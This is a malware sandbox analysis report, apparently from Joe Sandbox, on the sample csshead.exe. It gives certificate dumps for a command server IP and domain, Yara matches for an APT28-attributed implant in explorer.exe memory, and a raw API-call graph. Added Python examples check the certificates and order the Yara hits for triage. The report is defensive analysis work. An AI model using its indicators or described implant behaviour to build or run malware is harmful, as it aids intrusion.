Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: A8 4A 6A 63 04 7D DD BA E6 D1 39 B7 A6 45 65 EF .Jjc......9..Ee.0010: F3 A8 EC A1 ....]]] Algorithm: [SHA256withRSA] Signature:0000: DD 33 D7 11 F3 63 58 38 DD 18 15 FB 09 55 BE 76 .3...cX8.....U.v0010: 56 B9 70 48 A5 69 47 27 7B C2 24 08 92 F1 5A 1F V.pH.iG'..$...Z.0020: 4A 12 29 37 24 74 51 1C 62 68 B8 CD 95 70 67 E5 J.)7$tQ.bh...pg.0030: F7 A4 BC 4E 28 51 CD 9B E8 AE 87 9D EA D8 BA 5A ...N(Q.........Z0040: A1 01 9A DC F0 DD 6A 1D 6A D8 3E 57 23 9E A6 1E ......j.j.>W#...0050: 04 62 9A FF D7 05 CA B7 1F 3F C0 0A 48 BC 94 B0 .b.......?..H...0060: B6 65 62 E0 C1 54 E5 A3 2A AD 20 C4 E9 E6 BB DC .eb..T..*. 
.....0070: C8 F6 B5 C3 32 A3 98 CC 77 A8 E6 79 65 07 2B CB ....2...w..ye.+.0080: 28 FE 3A 16 52 81 CE 52 0C 2E 5F 83 E8 D5 06 33 (.:.R..R.._....30090: FB 77 6C CE 40 EA 32 9E 1F 92 5C 41 C1 74 6C 5B .wl.@.2...\A.tl[00A0: 5D 0A 5F 33 CC 4D 9F AC 38 F0 2F 7B 2C 62 9D D9 ]._3.M..8./.,b..00B0: A3 91 6F 25 1B 2F 90 B1 19 46 3D F6 7E 1B A6 7A ..o%./...F=....z00C0: 87 B9 A3 7A 6D 18 FA 25 A5 91 87 15 E0 F2 16 2F ...zm..%......./00D0: 58 B0 06 2F 2C 68 26 C6 4B 98 CD DA 9F 0C F9 7F X../,h&.K.......00E0: 90 ED 43 4A 12 44 4E 6F 73 7A 28 EA A4 AA 6E 7B ..CJ.DNosz(...n.00F0: 4C 7D 87 DD E0 C9 02 44 A7 87 AF C3 34 5B B4 42 L......D....4[.B]
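The two certificates above are what the server at 212.92.98.68:443 presented to the sandbox client at the capture time shown in the table. The following is an added example (not part of this report and not Joe Sandbox code) that puts the fields a triager actually reads into code: the leaf's SAN list, its validity window, the intermediate's basicConstraints, and the leaf's age at capture. Certificate fields and the capture timestamp are transcribed from the dumps; the wildcard rule is RFC 6125 section 6.4.3 as commonly implemented (a single `*` as the whole left-most label, matching exactly one label). The report does not record which SNI the client sent, so the hostnames checked are constructed examples, and no signature verification is attempted because the DER is not on the page.

```python
"""Checks on the certificates logged for the 212.92.98.68:443 session.

Added example, not part of the report or of Joe Sandbox. Cert fields are
transcribed from the two dumps (leaf for wigermexir.com, Let's Encrypt
Authority X3 intermediate) and the capture timestamp from the table row.
Hostnames passed to assess() are constructed examples: the report does not
record the SNI the client sent.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional, Tuple

CET = timezone(timedelta(hours=1))
CEST = timezone(timedelta(hours=2))


@dataclass(frozen=True)
class Cert:
    subject: str
    issuer: str
    not_before: datetime
    not_after: datetime
    sans: Tuple[str, ...] = ()
    is_ca: bool = False
    path_len: Optional[int] = None


# Transcribed from the report's certificate dumps.
LEAF = Cert(
    subject="CN=wigermexir.com",
    issuer="CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US",
    not_before=datetime(2018, 7, 1, 12, 8, 7, tzinfo=CEST),
    not_after=datetime(2018, 9, 29, 12, 8, 7, tzinfo=CEST),
    sans=("*.wigermexir.com", "wigermexir.com"),
)
INTERMEDIATE = Cert(
    subject="CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US",
    issuer="CN=DST Root CA X3, O=Digital Signature Trust Co.",
    not_before=datetime(2016, 3, 17, 17, 40, 46, tzinfo=CET),
    not_after=datetime(2021, 3, 17, 17, 40, 46, tzinfo=CET),
    is_ca=True,
    path_len=0,
)
CAPTURED_AT = datetime(2018, 7, 4, 14, 5, 41, tzinfo=CEST)


def _labels(name: str):
    return name.lower().rstrip(".").split(".")


def san_matches(hostname: str, pattern: str) -> bool:
    """dNSName comparison: case-insensitive; '*' allowed only as the entire
    left-most label and matching exactly one label, so '*.wigermexir.com'
    covers 'www.wigermexir.com' but neither the bare domain nor 'a.b.wigermexir.com'."""
    host, pat = _labels(hostname), _labels(pattern)
    if "*" not in pattern:
        return host == pat
    if pat[0] != "*" or any("*" in label for label in pat[1:]) or len(pat) < 3:
        return False  # partial, deep or overly broad wildcards: refuse rather than guess
    return len(host) == len(pat) and host[1:] == pat[1:]


def hostname_allowed(hostname: str, cert: Cert) -> bool:
    """With a SAN extension present the subject CN is not consulted (RFC 6125 6.4.4)."""
    return any(san_matches(hostname, san) for san in cert.sans)


def valid_at(cert: Cert, when: datetime) -> bool:
    return cert.not_before <= when <= cert.not_after


def chain_consistent(leaf: Cert, intermediate: Cert) -> bool:
    """Name chaining and basicConstraints only; no signature check here."""
    if leaf.issuer != intermediate.subject or not intermediate.is_ca:
        return False
    return intermediate.path_len is None or intermediate.path_len >= 0


def assess(hostname: str, leaf: Cert, intermediate: Cert, when: datetime) -> dict:
    """The four things a triager reads off this table row."""
    return {
        "hostname_ok": hostname_allowed(hostname, leaf),
        "valid_at_capture": valid_at(leaf, when) and valid_at(intermediate, when),
        "chain_consistent": chain_consistent(leaf, intermediate),
        "leaf_age_days": (when - leaf.not_before).days,
    }


if __name__ == "__main__":
    print(assess("www.wigermexir.com", LEAF, INTERMEDIATE, CAPTURED_AT))
```

For this row the result is a chain that is internally consistent and valid at capture, with a leaf that was three days old when the sample connected; a freshly issued free certificate on a newly registered name is a common profile for malware infrastructure and is worth carrying into the indicator list alongside the IP.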

Code Manipulations

Statistics

CPU Usage, Memory Usage, High Level Behavior Distribution and Behavior: per-process charts (graphical only; no data in the text report)

System Behavior

General

Start time: 13:59:40
Start date: 04/07/2018
Path: C:\Users\user\Desktop\csshead.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\user\Desktop\csshead.exe'
Imagebase: 0x400000
File size: 165888 bytes
MD5 hash: F0309AA0519EE70C29BBB471352781E7
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
  • Rule: IMPLANT_4_v10, Description: BlackEnergy / Voodoo Bear Implant by APT28, Source: 00000000.00000002.27490223943.00050000.00000004.sdmp, Author: US CERT
Reputation: low

General

Start time: 14:00:21
Start date: 04/07/2018
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe
Imagebase: 0xe20000
File size: 4064320 bytes
MD5 hash: FCBCED2A237DCD7EF86CED551B731742
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
  • Rule: IMPLANT_4_v10, Description: BlackEnergy / Voodoo Bear Implant by APT28, Source: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Author: US CERT
Reputation: moderate

Note on the Yara Source fields: the dump names have the form <process index>.<dump index>.<timestamp>.<base address>.<page protection>.sdmp, with the trailing field read as the Win32 page-protection value. The csshead.exe hit is in a region at 0x50000 with protection 0x04 (PAGE_READWRITE); the explorer.exe hit is in a region at 0x7C0000 with protection 0x40 (PAGE_EXECUTE_READWRITE). The same implant signature inside a writable and executable region of explorer.exe, started 41 seconds after the sample, is the finding to triage first.
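The two Yara "Source" fields above are the only place this report says where in memory the implant signature was found. The following is an added example (not Joe Sandbox code and not part of the report) that turns those fields into a triage order: it splits each dump name, decodes the page protection, and puts cross-process RWX hits first. The field layout <process index>.<dump index>.<timestamp>.<base address>.<page protection>.sdmp is inferred from the two names on this page and is an assumption; the protection constants are from winnt.h. The hit list is transcribed from the two process blocks.

```python
"""Triage of Joe Sandbox Yara "Source" memory-dump names.

Added example for this report, not Joe Sandbox code. Assumed dump-name layout
(inferred from the two Source fields in the process blocks):
    <process index>.<dump index>.<timestamp>.<base address>.<page protection>.sdmp
The last field is read as the Win32 page-protection value (winnt.h).
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Win32 page-protection constants (winnt.h). The low byte is the base
# protection; PAGE_GUARD / PAGE_NOCACHE / PAGE_WRITECOMBINE sit above it.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = 0x10 | 0x20 | 0x40 | 0x80
WRITABLE = 0x04 | 0x08 | 0x40 | 0x80

_SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<ts>\d+)"
    r"\.(?P<base>[0-9A-Fa-f]{8})\.(?P<prot>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpInfo:
    process_index: int
    dump_index: int
    base: int
    protect: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTIONS.get(self.protect & 0xFF, "0x%X" % self.protect)

    @property
    def is_rwx(self) -> bool:
        low = self.protect & 0xFF
        return bool(low & EXECUTABLE) and bool(low & WRITABLE)


@dataclass(frozen=True)
class YaraHit:
    process: str  # image name from the process "General" block
    rule: str
    source: str   # the Yara "Source" field


def parse_sdmp(name: str) -> Optional[DumpInfo]:
    """Split a .sdmp name into its fields; None if it does not fit the assumed layout."""
    m = _SDMP_RE.match(name)
    if not m:
        return None
    return DumpInfo(int(m["proc"], 16), int(m["dump"], 16),
                    int(m["base"], 16), int(m["prot"], 16))


def triage(hits: List[YaraHit], sample_image: str) -> List[dict]:
    """One finding per hit: where the match lives, whether the region is both
    writable and executable, and whether it sits in a process other than the
    sample itself. Cross-process RWX hits sort first."""
    findings = []
    for hit in hits:
        info = parse_sdmp(hit.source)
        if info is None:
            findings.append({"process": hit.process, "rule": hit.rule, "parsed": False})
            continue
        findings.append({
            "process": hit.process,
            "rule": hit.rule,
            "parsed": True,
            "base": info.base,
            "protection": info.protection_name,
            "rwx": info.is_rwx,
            "cross_process": hit.process.lower() != sample_image.lower(),
        })
    findings.sort(key=lambda f: (not f.get("cross_process", False),
                                 not f.get("rwx", False)))
    return findings


# Transcribed from this report's two process blocks.
YARA_HITS = [
    YaraHit("csshead.exe", "IMPLANT_4_v10",
            "00000000.00000002.27490223943.00050000.00000004.sdmp"),
    YaraHit("explorer.exe", "IMPLANT_4_v10",
            "00000001.00000002.28504861757.007C0000.00000040.sdmp"),
]

if __name__ == "__main__":
    for finding in triage(YARA_HITS, "csshead.exe"):
        print(finding)
```

Run against the two hits on this page, the explorer.exe match (0x7C0000, PAGE_EXECUTE_READWRITE, cross-process) comes out first and the sample's own match (0x50000, PAGE_READWRITE) second, which is the order an analyst would want to open the dumps in.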

Disassembly

Code Analysis


    Execution Graph

    Execution Coverage:13.8%
    Dynamic/Decrypted Code Coverage:0.7%
    Signature Coverage:20.9%
    Total number of Nodes:1830
    Total number of Limit Nodes:52

    Graph

    Execution graph, listed as API call sites recovered from the (truncated) graph dump; node addresses are as in the dump, the node-to-node edge list and the CRT helper nodes (__getbuf, __getptd, __amsg_exit, __cftof2_l, ___crtLCMapStringA, _write_string, std::exception::_Tidy, FindHandler) are not reproduced.

    Sample code (0x403xxx to 0x421xxx):
    - 0x41cae0, 0x41cb2a: LoadLibraryA, LoadIconA, OleCreatePictureIndirect
    - 0x41cd0f: CreateEventA, GetClassLongA, SetClassLongA, GetCursorPos; 0x41cd70: GetCursorPos; 0x41cfaf: WaitForSingleObject (edges back to the GetCursorPos node)
    - 0x41d090: WaitNamedPipeA; 0x41d0a3: CreateFileA; 0x41d0c9: SetNamedPipeHandleState; 0x41d0f2: WriteFile; 0x41d10a: ReadFile; 0x41d0e3, 0x41d107, 0x41d122: CloseHandle (a named-pipe client: open the pipe, set its mode, write a request, read the reply)
    - 0x41d13e, 0x41d1df: LookupAccountNameA with GetLastError; 0x41d17b, 0x41d190, 0x41d1b0, 0x41d1cf, 0x41d201: GetLastError; 0x41d19b, 0x41d1c0: LocalAlloc; 0x41d215: LocalFree
    - 0x41d2f4: SetStretchBltMode; 0x41d30d: SetAbortProc, DrawFrameControl; 0x41d35e: LoadImageA; 0x41d3d6: SetWindowLongA
    - 0x41d516: CreateEventA, GetCursorPos; 0x41d5b0: GetCursorPos; 0x41d5d0: DragQueryFile; 0x41d694: CreateRectRgnIndirect; 0x41d6e3: WaitForSingleObject; 0x41d70f: EnableMenuItem
    - 0x41d75f: GetDlgItem, OleInitialize; 0x41d93c: RegisterDragDrop, GetTopWindow, RevokeDragDrop; 0x41d95a: OleUninitialize; 0x41d987: SetMenuItemInfoA; 0x41d9bc: GetLastError; 0x41d9c4: DrawMenuBar
    - 0x41d9da: GetMenuItemInfoA, BeginPaint, EndPaint, GetClientRect, EnumDateFormatsA; 0x41da80, 0x41da8c, 0x41da98, 0x41daa4: lstrcmpi; 0x41db3e: Sleep
    - 0x4198e0: RtlEnterCriticalSection, GetCurrentThreadId; 0x414189: RtlLeaveCriticalSection; 0x4199d2: InterlockedIncrement, ShowWindow; 0x410190: IsWindow; 0x4101a4: GetWindowLongA; 0x4101bf: SetWindowLongA
    - 0x417f5c: OleInitialize, GetWindowTextLengthA; 0x417f07, 0x417f39: GetWindowLongA; 0x417f1d: GetWindowLongA, SetWindowLongA; 0x417f51: OleUninitialize; 0x417fb3: GetWindowTextA, SetWindowTextA; 0x417fe7: GlobalAlloc; 0x417ff6: GlobalFix; 0x41800e: GlobalUnWire; 0x41802a: lstrlen; 0x418132: SetWindowLongA; 0x418166: NtdllDefWindowProc_A
    - 0x418480: RtlEnterCriticalSection, RegisterClipboardFormatA (twice), GetClassInfoExA; 0x4184de, 0x418582: LoadCursorA, RegisterClassExA; 0x418562: GetClassInfoExA; 0x4185ff: RtlLeaveCriticalSection
    - 0x410777: SysAllocString; 0x410719: SysFreeString
    - 0x408bf8: RegOpenKeyExA; 0x4038b0: RegQueryValueExA; 0x403890: RegCloseKey
    - 0x421df6: GetProcessHeap, HeapFree; 0x421e07: RtlInterlockedPushEntrySList
    - 0x423991 (FindHandler) and 0x4239c6: RaiseException

    C runtime (0x422xxx to 0x430xxx):
    - Startup from 0x424c01: 0x424c0d: GetStartupInfoW; 0x424c21: HeapSetInformation; 0x42769e: HeapCreate; 0x4260a2: GetModuleHandleW; 0x4260bf: GetProcAddress (four calls); 0x426109: TlsAlloc; 0x426157: TlsSetValue; 0x4261b0, 0x4261e3: RtlDecodePointer; 0x426200: GetCurrentThreadId
    - 0x42ce7d: GetStartupInfoW; 0x42d046: GetStdHandle; 0x42cfbc, 0x42d058: GetFileType; 0x42cfc7, 0x42d07e: InitializeCriticalSectionAndSpinCount; 0x42d0aa: SetHandleCount; 0x424cb0: GetCommandLineA; 0x42cde6: GetEnvironmentStringsW; 0x42ce17, 0x42ce45: WideCharToMultiByte; 0x42ce63, 0x42ce6f: FreeEnvironmentStringsW; 0x42cd45: GetModuleFileNameA
    - Write path from 0x42d421: 0x42d518: GetConsoleMode; 0x42d551: GetConsoleCP; 0x42d620, 0x42d9b4: WideCharToMultiByte; 0x42d651, 0x42d6a5, 0x42d80b, 0x42d8e5, 0x42d9eb, 0x42da4f: WriteFile; 0x42da22, 0x42da82: GetLastError; 0x430224: WriteConsoleW, CreateFileW; 0x42d2e9: SetFilePointer; 0x42d301: GetLastError
    - 0x42b169, 0x4301c9: RtlEnterCriticalSection; 0x43019f: InitializeCriticalSectionAndSpinCount; 0x42b1d7, 0x42bfb2, 0x4301fd: RtlLeaveCriticalSection; 0x42ba0e, 0x42ba7b, 0x42ba9d: RtlDecodePointer; 0x425576: InterlockedIncrement; 0x42555c, 0x425a65, 0x425a7a, 0x425a87, 0x425a94, 0x425aa1, 0x425abd, 0x425acd, 0x425ad8: InterlockedDecrement
19767 425114 __fltout2 10 API calls 19765->19767 19766->19758 19766->19760 19766->19761 19766->19762 19766->19764 19766->19765 19768 42cb90 19767->19768 19769 42e750 _parse_cmdline 76 API calls 19768->19769 19771 42cc1d 19768->19771 19769->19768 19770 42cd1b 19770->19674 19771->19770 19772 42e750 76 API calls _parse_cmdline 19771->19772 19772->19771 19774 424451 __except_handler3 19773->19774 19978 42893e 19774->19978 19776 42446f __initterm_e 19777 4249b3 76 API calls 19776->19777 19778 424490 __except_handler3 19776->19778 19777->19778 19778->19678 19780 42ca64 19779->19780 19784 42ca69 19779->19784 19781 4259a7 82 API calls 19780->19781 19781->19784 19782 424cff 19785 419d20 CoInitialize NtdllDefWindowProc_A 19782->19785 19783 42e750 _parse_cmdline 76 API calls 19783->19784 19784->19782 19784->19783 19786 419d5b 19785->19786 19787 418480 10 API calls 19786->19787 19788 419d79 GetCommandLineA 19787->19788 19789 419db0 6 API calls 19788->19789 19791 419f22 CreateMetaFileA 19789->19791 19791->19791 19792 419f35 SetBrushOrgEx LoadImageA 19791->19792 19793 423911 77 API calls 19792->19793 19794 419f7e 19793->19794 19795 41c8fa 19794->19795 19798 419fd1 FtpPutFileEx 19794->19798 19796 423189 FindHandler 66 API calls 19795->19796 19797 41dbf0 19796->19797 19799 423991 FindHandler RaiseException 19797->19799 19801 41a038 GetSysColorBrush FrameRect 19798->19801 19800 41dc07 19799->19800 19803 41a0a6 19801->19803 19804 41a0b3 GlobalAlloc GetLastError GetIconInfo GetIconInfo 19803->19804 19805 41a1fc GetDIBits GetDIBits 19804->19805 19806 41a26b __cftof2_l 19805->19806 19807 41a2c9 GetDIBits GetDIBits 19806->19807 19808 41a332 19807->19808 19809 41a343 GetDlgItem SetWindowContextHelpId 19808->19809 19809->19809 19810 41a39d __cftof2_l 19809->19810 19811 41a415 mmioSetInfo mmioAscend 19810->19811 19812 41a467 GetSystemInfo 19811->19812 19814 41a4da GetSystemTimeAsFileTime SetConsoleCtrlHandler 19812->19814 19815 41a56a CreateIoCompletionPort 19814->19815 19816 41a890 
CopyImage 19815->19816 19818 41a950 19816->19818 19819 41aa1c DrawMenuBar FindResourceA 19818->19819 19820 41aa46 VirtualAlloc 19819->19820 19821 41aa72 __cftof2_l 19820->19821 19822 41aaa1 LoadLibraryA LoadIconA OleCreatePictureIndirect 19821->19822 19823 41aaf8 __cftof2_l 19822->19823 19824 41ab69 LoadLibraryA LoadIconA OleCreatePictureIndirect 19823->19824 19825 41abb0 __cftof2_l 19824->19825 19826 41ac21 LoadLibraryA LoadIconA OleCreatePictureIndirect 19825->19826 19827 41ac62 19826->19827 19828 422a18 __getbuf 66 API calls 19827->19828 19829 41adfa 19828->19829 19830 41ae43 LoadLibraryA LoadIconA OleCreatePictureIndirect 19829->19830 19831 41ae85 19830->19831 19832 422a18 __getbuf 66 API calls 19831->19832 19833 41aee0 19832->19833 19834 41af40 LoadLibraryA LoadIconA OleCreatePictureIndirect 19833->19834 19835 41af8e 19834->19835 19836 422a18 __getbuf 66 API calls 19835->19836 19837 41afe2 19836->19837 19838 41b0c0 LoadLibraryA LoadIconA OleCreatePictureIndirect 19837->19838 19839 41b102 19838->19839 19840 422a18 __getbuf 66 API calls 19839->19840 19841 41b227 __cftof2_l 19840->19841 19842 422a18 __getbuf 66 API calls 19841->19842 19843 41b2b8 19842->19843 19844 422a18 __getbuf 66 API calls 19843->19844 19845 41b361 __cftof2_l 19844->19845 19846 422a18 __getbuf 66 API calls 19845->19846 19847 41b499 19846->19847 19848 41b4e2 LoadLibraryA LoadIconA OleCreatePictureIndirect 19847->19848 19849 41b52a __cftof2_l 19848->19849 19850 422a18 __getbuf 66 API calls 19849->19850 19851 41b646 19850->19851 19852 41b6a6 LoadLibraryA LoadIconA OleCreatePictureIndirect 19851->19852 19853 41b6f6 LoadLibraryA LoadIconA OleCreatePictureIndirect 19852->19853 19855 41b765 __cftof2_l 19853->19855 19856 422a18 __getbuf 66 API calls 19855->19856 19857 41b891 __cftof2_l 19856->19857 19858 41b8fd LoadLibraryA LoadIconA OleCreatePictureIndirect 19857->19858 19859 41b94b LoadLibraryA LoadIconA OleCreatePictureIndirect 19858->19859 19861 41ba1f 19859->19861 19862 422a18 __getbuf 66 API 
calls 19861->19862 19863 41ba8d __cftof2_l 19862->19863 19864 422a18 __getbuf 66 API calls 19863->19864 19865 41bb3a 19864->19865 19866 41bb87 LoadLibraryA LoadIconA OleCreatePictureIndirect 19865->19866 19867 41bbd1 __cftof2_l 19866->19867 19868 422a18 __getbuf 66 API calls 19867->19868 19869 41bf0f __cftof2_l 19868->19869 19870 422a18 __getbuf 66 API calls 19869->19870 19871 41bfa4 19870->19871 19872 41c07f LoadLibraryA LoadIconA OleCreatePictureIndirect 19871->19872 19873 41c0cb 19872->19873 19874 422a18 __getbuf 66 API calls 19873->19874 19875 41c13c 19874->19875 19876 422a18 __getbuf 66 API calls 19875->19876 19877 41c27a 19876->19877 19878 41c2a6 LoadLibraryA LoadIconA OleCreatePictureIndirect 19877->19878 19879 41c2ee __cftof2_l 19878->19879 19880 422a18 __getbuf 66 API calls 19879->19880 19881 41c385 19880->19881 19882 41c3b1 LoadLibraryA LoadIconA OleCreatePictureIndirect 19881->19882 19883 41c3f3 __cftof2_l 19882->19883 19884 41c5b8 LoadLibraryA LoadIconA OleCreatePictureIndirect 19883->19884 19885 41c602 19884->19885 19886 422a18 __getbuf 66 API calls 19885->19886 19887 41c670 __cftof2_l 19886->19887 19888 41c6de LoadLibraryA LoadIconA OleCreatePictureIndirect 19887->19888 19889 41c728 __cftof2_l 19888->19889 19890 422a18 __getbuf 66 API calls 19889->19890 19891 41c86b 19890->19891 19892 41c8b4 LoadLibraryA LoadIconA OleCreatePictureIndirect 19891->19892 19892->19795 19894 424be6 19893->19894 19895 424beb 19893->19895 19897 426517 __amsg_exit 66 API calls 19894->19897 19896 426368 __amsg_exit 66 API calls 19895->19896 19898 424bf3 19896->19898 19897->19895 19899 4243c2 __amsg_exit 3 API calls 19898->19899 19900 424bfd 19899->19900 19900->19658 19920 425cfe RtlEncodePointer 19901->19920 19903 4243f4 19921 42af49 RtlEncodePointer 19903->19921 19905 42441a RtlEncodePointer RtlEncodePointer RtlEncodePointer RtlEncodePointer 19906 42bf11 19905->19906 19907 42bf1c 19906->19907 19908 42bf26 InitializeCriticalSectionAndSpinCount 19907->19908 19909 4261ac 
19907->19909 19908->19907 19908->19909 19909->19705 19909->19706 19911 425d8b RtlDecodePointer 19910->19911 19913 425d9a 19910->19913 19911->19913 19912 425dab TlsFree 19914 425db9 19912->19914 19913->19912 19913->19914 19915 42bf77 RtlDeleteCriticalSection 19914->19915 19917 42bf8f 19914->19917 19916 422804 std::exception::_Tidy 66 API calls 19915->19916 19916->19914 19918 4260bb 19917->19918 19919 42bfa1 RtlDeleteCriticalSection 19917->19919 19918->19659 19919->19917 19920->19903 19921->19905 19923 42cbb0 19922->19923 19927 42cc1d 19923->19927 19932 42e750 19923->19932 19925 42cd1b 19925->19749 19925->19750 19926 42e750 76 API calls _parse_cmdline 19926->19927 19927->19925 19927->19926 19929 4259b0 19928->19929 19931 4259b7 19928->19931 19938 42580d 19929->19938 19931->19743 19935 42e6e4 19932->19935 19936 42224b ___crtLCMapStringA 76 API calls 19935->19936 19937 42e6f7 19936->19937 19937->19923 19939 425819 FindHandler 19938->19939 19940 425eeb __getptd 66 API calls 19939->19940 19941 425822 19940->19941 19942 425504 ___crtLCMapStringA 68 API calls 19941->19942 19943 42582c 19942->19943 19967 4255a8 19943->19967 19946 42596c FindHandler 19946->19931 19947 42a0df __getbuf 66 API calls 19948 42584d 19947->19948 19948->19946 19949 42587d InterlockedDecrement 19948->19949 19950 425979 19948->19950 19951 42589e InterlockedIncrement 19949->19951 19953 42588d 19949->19953 19950->19946 19952 42598c 19950->19952 19956 422804 std::exception::_Tidy 66 API calls 19950->19956 19951->19946 19954 4258b4 19951->19954 19955 4251b8 __cftof2_l 66 API calls 19952->19955 19953->19951 19957 422804 std::exception::_Tidy 66 API calls 19953->19957 19954->19946 19958 42c08b ___crtLCMapStringA 66 API calls 19954->19958 19955->19946 19956->19952 19959 42589d 19957->19959 19960 4258c8 InterlockedDecrement 19958->19960 19959->19951 19962 425944 19960->19962 19963 425957 InterlockedIncrement 19960->19963 19962->19963 19965 422804 std::exception::_Tidy 66 API calls 19962->19965 19974 42596e 
19963->19974 19966 425956 19965->19966 19966->19963 19968 42224b ___crtLCMapStringA 76 API calls 19967->19968 19969 4255bc 19968->19969 19970 4255c7 GetOEMCP 19969->19970 19971 4255e5 19969->19971 19973 4255d7 19970->19973 19972 4255ea GetACP 19971->19972 19971->19973 19972->19973 19973->19946 19973->19947 19977 42bfb2 RtlLeaveCriticalSection 19974->19977 19976 425975 19976->19946 19977->19976 19979 428944 RtlEncodePointer 19978->19979 19979->19979 19980 42895e 19979->19980 19980->19776 21045 405d1c 21046 405d38 21045->21046 21077 406102 21045->21077 21046->21077 21113 4054b8 21046->21113 21051 405858 3 API calls 21052 405dfe 21051->21052 21126 4017e8 21052->21126 21062 4060b0 21160 4013dc GetProcessHeap RtlAllocateHeap 21062->21160 21063 406056 21141 405894 21063->21141 21066 405eaf 21066->21062 21066->21063 21068 4060ae 21072 4060fa 21068->21072 21073 406107 21068->21073 21070 40607a 21071 405894 6 API calls 21070->21071 21071->21068 21161 401440 GetProcessHeap HeapFree 21072->21161 21162 401440 GetProcessHeap HeapFree 21073->21162 21076 40610f 21076->21077 21163 4013dc GetProcessHeap RtlAllocateHeap 21076->21163 21079 4061c5 21080 4061d8 21079->21080 21081 4061cb 21079->21081 21166 4013dc GetProcessHeap RtlAllocateHeap 21080->21166 21165 401440 GetProcessHeap HeapFree 21081->21165 21085 4061e1 21167 4059bc 21085->21167 21087 40614f 21087->21077 21087->21079 21164 401460 GetProcessHeap RtlReAllocateHeap 21087->21164 21089 4017e8 CryptAcquireContextA 21090 406222 21089->21090 21181 401374 21090->21181 21095 401404 CryptHashData 21096 406261 21095->21096 21097 401404 CryptHashData 21096->21097 21098 40627e 21097->21098 21099 401404 CryptHashData 21098->21099 21100 406292 21099->21100 21187 401490 21100->21187 21105 401b20 CryptReleaseContext 21106 4062c4 21105->21106 21107 4062db 21106->21107 21108 4062fd 21106->21108 21193 401440 GetProcessHeap HeapFree 21107->21193 21195 401440 GetProcessHeap HeapFree 21108->21195 21111 4062e3 21194 401440 GetProcessHeap HeapFree 
21111->21194 21114 4054cb 21113->21114 21118 405567 21114->21118 21196 401844 wsprintfA 21114->21196 21115 40560f 21119 405858 21115->21119 21118->21115 21197 401844 wsprintfA 21118->21197 21120 4017e8 CryptAcquireContextA 21119->21120 21121 405877 21120->21121 21198 40153c 21121->21198 21124 401b20 CryptReleaseContext 21125 40588f 21124->21125 21125->21051 21127 40181e 21126->21127 21128 401801 CryptAcquireContextA 21126->21128 21129 4018a0 21127->21129 21128->21127 21130 4018da 21129->21130 21131 4018b9 CryptImportKey 21129->21131 21132 401ab0 21130->21132 21131->21130 21133 401aee 21132->21133 21134 401ac9 CryptEncrypt 21132->21134 21135 401af8 21133->21135 21134->21133 21136 401b0b CryptDestroyKey 21135->21136 21137 401b18 21135->21137 21136->21137 21138 401b20 21137->21138 21139 401b47 21138->21139 21140 401b36 CryptReleaseContext 21138->21140 21139->21066 21140->21139 21142 4017e8 CryptAcquireContextA 21141->21142 21143 4058bb 21142->21143 21144 4018a0 CryptImportKey 21143->21144 21145 405904 21144->21145 21201 401574 21145->21201 21148 401574 CryptSetKeyParam 21149 405936 21148->21149 21150 405945 21149->21150 21152 405960 21149->21152 21151 401ab0 CryptEncrypt 21150->21151 21153 40595e 21151->21153 21154 401ab0 CryptEncrypt 21152->21154 21155 401af8 CryptDestroyKey 21153->21155 21154->21153 21156 4059a9 21155->21156 21157 401b20 CryptReleaseContext 21156->21157 21158 4059b3 21157->21158 21159 4013dc GetProcessHeap RtlAllocateHeap 21158->21159 21159->21070 21160->21068 21161->21077 21162->21076 21163->21087 21164->21087 21165->21077 21166->21085 21168 4059d6 21167->21168 21169 4059e3 21167->21169 21168->21089 21169->21168 21170 4017e8 CryptAcquireContextA 21169->21170 21171 405a0f 21170->21171 21172 4018a0 CryptImportKey 21171->21172 21173 405a58 21172->21173 21174 401574 CryptSetKeyParam 21173->21174 21175 405a71 21174->21175 21204 4017a4 21175->21204 21177 405a9c 21178 401af8 CryptDestroyKey 21177->21178 21179 405ad2 21178->21179 21180 401b20 
CryptReleaseContext 21179->21180 21180->21168 21182 4013aa 21181->21182 21183 40138d CryptCreateHash 21181->21183 21184 401404 21182->21184 21183->21182 21185 401436 21184->21185 21186 40141d CryptHashData 21184->21186 21185->21095 21186->21185 21188 4014a9 CryptGetHashParam 21187->21188 21189 4014c6 21187->21189 21188->21189 21190 4014d0 21189->21190 21191 4014e3 CryptDestroyHash 21190->21191 21192 4014f0 21190->21192 21191->21192 21192->21105 21193->21111 21194->21077 21195->21077 21196->21114 21197->21118 21199 401555 CryptGenRandom 21198->21199 21200 40156a 21198->21200 21199->21200 21200->21124 21202 40158d CryptSetKeyParam 21201->21202 21203 4015a6 21201->21203 21202->21203 21203->21148 21205 4017de 21204->21205 21206 4017bd CryptDecrypt 21204->21206 21205->21177 21206->21205 21212 42a355 21218 42a303 __CallSettingFrame@12 21212->21218 21213 42a36a 21226 42a38f 21213->21226 21216 42a380 FindHandler 21218->21213 21220 42af11 21218->21220 21219 42af11 FindHandler 69 API calls 21219->21216 21231 429ef0 21220->21231 21222 42af1d RtlDecodePointer 21225 42af2d 21222->21225 21232 42aec5 21225->21232 21227 425eeb __getptd 66 API calls 21226->21227 21229 42a394 21227->21229 21228 42a376 21228->21216 21228->21219 21229->21228 21230 425eeb __getptd 66 API calls 21229->21230 21230->21228 21231->21222 21233 42aed1 FindHandler 21232->21233 21234 425eeb __getptd 66 API calls 